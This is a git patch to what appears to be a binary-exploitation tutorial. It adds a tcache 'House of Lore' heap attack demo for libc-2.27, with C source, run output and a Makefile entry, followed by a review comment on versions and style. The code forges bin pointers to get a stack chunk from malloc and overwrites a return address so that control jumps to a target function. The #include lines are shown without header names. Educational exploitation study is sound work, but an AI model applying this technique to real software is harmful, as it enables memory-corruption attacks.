From b672b21288c59438c720970740c8f900643ba90a Mon Sep 17 00:00:00 2001
From: firmianay
Date: Wed, 23 May 2018 11:18:32 +0800
Subject: [PATCH] add tcache_house_of_lore
---
 doc/3.1.7_heap_exploit_2.md | 92 +++++++++++++++++++
 src/others/3.1.6_heap_exploit/Makefile | 2 +-
 .../3.1.6_heap_exploit/tcache_house_of_lore.c | 66 +++++++++++++
 3 files changed, 159 insertions(+), 1 deletion(-)
 create mode 100644 src/others/3.1.6_heap_exploit/tcache_house_of_lore.c
diff --git a/doc/3.1.7_heap_exploit_2.md b/doc/3.1.7_heap_exploit_2.md
index 5185a77..5dbaf3f 100644
--- a/doc/3.1.7_heap_exploit_2.md
+++ b/doc/3.1.7_heap_exploit_2.md
@@ -672,6 +672,98 @@ READ of size 8 at 0x60c00000bf80 thread T0 #2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38) ``` +最后再给一个 libc-2.27 版本的: +```c +#include +#include +#include +#include + +void jackpot(){ puts("Nice jump d00d"); exit(0); } + +int main() { + intptr_t *victim = malloc(0x80); + + // fill the tcache + int *a[10]; + int i; + for (i = 0; i < 7; i++) { + a[i] = malloc(0x80); + } + for (i = 0; i < 7; i++) { + free(a[i]); + } + + memset(victim, 'A', 0x80); + void *p5 = malloc(0x10); + memset(p5, 'A', 0x10); + intptr_t *victim_chunk = victim - 2; + fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim); + + intptr_t* stack_buffer_1[4] = {0}; + intptr_t* stack_buffer_2[6] = {0}; + stack_buffer_1[0] = 0; + stack_buffer_1[2] = victim_chunk; + stack_buffer_1[3] = (intptr_t*)stack_buffer_2; + stack_buffer_2[2] = (intptr_t*)stack_buffer_1; + stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin; + + fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1); + fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2); + + free((void*)victim); + fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim); + fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + void *p2 = malloc(0x100); + fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2); + fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim); + fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + victim[1] = (intptr_t)stack_buffer_1; + fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); + + void *p3 = malloc(0x40); + + // empty the tcache + for (i = 0; i < 7; i++) { + a[i] = malloc(0x80); + } + + char *p4 = malloc(0x80); + memset(p4, 'A', 0x10); + fprintf(stderr, 
"This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4); + fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]); + + intptr_t sc = (intptr_t)jackpot; + memcpy((p4+0xa8), &sc, 8); +} +``` +``` +$ gcc -g house_of_lore.c +$ ./a.out +Allocated the victim (small) chunk: 0x55674d75f260 +stack_buffer_1: 0x7ffff71fb1d0 +stack_buffer_2: 0x7ffff71fb1f0 + +Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin +victim->fd: 0x7f1eba392b00 +victim->bk: 0x7f1eba392b00 + +Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700 +The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin +victim->fd: 0x7f1eba392b80 +victim->bk: 0x7f1eba392b80 + +Now emulating a vulnerability that can overwrite the victim->bk pointer +This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0 +The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0 + +Nice jump d00d +``` + #### overlapping_chunks ```c #include diff --git a/src/others/3.1.6_heap_exploit/Makefile b/src/others/3.1.6_heap_exploit/Makefile index 9905c35..31fe599 100644 --- a/src/others/3.1.6_heap_exploit/Makefile +++ b/src/others/3.1.6_heap_exploit/Makefile @@ -1,4 +1,4 @@ -PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange +PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange CFLAGS += -std=c99 -g # CFLAGS += -fsanitize=address 
diff --git a/src/others/3.1.6_heap_exploit/tcache_house_of_lore.c b/src/others/3.1.6_heap_exploit/tcache_house_of_lore.c
new file mode 100644
index 0000000..30a71b7
--- /dev/null
+++ b/src/others/3.1.6_heap_exploit/tcache_house_of_lore.c
@@ -0,0 +1,66 @@
+#include
+#include
+#include
+#include
+
+void jackpot(){ puts("Nice jump d00d"); exit(0); }
+
+int main() {
+ intptr_t *victim = malloc(0x80);
+
+ // fill the tcache
+ int *a[10];
+ int i;
+ for (i = 0; i < 7; i++) {
+ a[i] = malloc(0x80);
+ }
+ for (i = 0; i < 7; i++) {
+ free(a[i]);
+ }
+
+ memset(victim, 'A', 0x80);
+ void *p5 = malloc(0x10);
+ memset(p5, 'A', 0x10);
+ intptr_t *victim_chunk = victim - 2;
+ fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
+
+ intptr_t* stack_buffer_1[4] = {0};
+ intptr_t* stack_buffer_2[6] = {0};
+ stack_buffer_1[0] = 0;
+ stack_buffer_1[2] = victim_chunk;
+ stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
+ stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
+ stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin;
+
+ fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
+ fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
+
+ free((void*)victim);
+ fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
+ fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
+ fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
+
+ void *p2 = malloc(0x100);
+ fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
+ fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
+ fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
+ fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
+
+ victim[1] = (intptr_t)stack_buffer_1;
+ fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
+
+ void *p3 = malloc(0x40);
+
+ // empty the tcache
+ for (i = 0; i < 7; i++) {
+ a[i] = malloc(0x80);
+ }
+
+ char *p4 = malloc(0x80);
+ memset(p4, 'A', 0x10);
+ fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
+ fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
+
+ intptr_t sc = (intptr_t)jackpot;
+ memcpy((p4+0xa8), &sc, 8);
+}
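Review bot: The new file never states which glibc it is written for, although the walkthrough depends on tcache being present and the comment `// 3675 bck->fd = bin;` cites a malloc.c line number that is only meaningful for one release; the doc hunk in this same commit names libc-2.27, so the source should say so itself. A short header comment such as `/* House of Lore variant for a tcache-enabled glibc (2.27 per doc/3.1.7_heap_exploit_2.md): the seven malloc/free pairs fill the tcache bin for the 0x80 request size so the victim chunk reaches the unsorted bin; line numbers in comments refer to that release's malloc.c. */` would make the expected environment explicit. As rendered here the four `#include` lines carry no header name; if that is also how the file was committed it will not compile, otherwise it is a rendering artifact worth confirming. Minor style: `void jackpot()` and `int main()` would be clearer as `(void)` prototypes, and `p3` is assigned but never read, which `-Wall` would flag but the Makefile's `CFLAGS += -std=c99 -g` does not enable.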